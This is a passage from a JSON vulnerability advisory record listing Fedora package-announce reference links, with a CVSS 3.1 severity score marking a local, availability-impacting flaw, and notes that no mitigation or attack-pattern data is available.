      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AF2CNP4FVC6LDKNOO4WDCGNDYIP3MPK6"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BEGXBDEMTFGINETMJENBZ6SCHVEJQJSY"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CI23LXPEV2GCDQTJSKO6CIILBDTI3R42"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FTZXHFZD36BGE5P6JF252NZZLKMGCY4T"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/G2M5CRSGPRF7G3YB5CLU4FXW7ANNHAYT"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ID6II3RIKAMVGVMC6ZAQIXXYYDMTVC4N"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXX76TJMZBPN3NU542MGN6B7C7QHRFGB"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VP2YEXEAJWI76FPM7D7VXHWD3WESQEYC"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

No mitigation information available for this CWE.

No CAPEC attack patterns related to this CWE.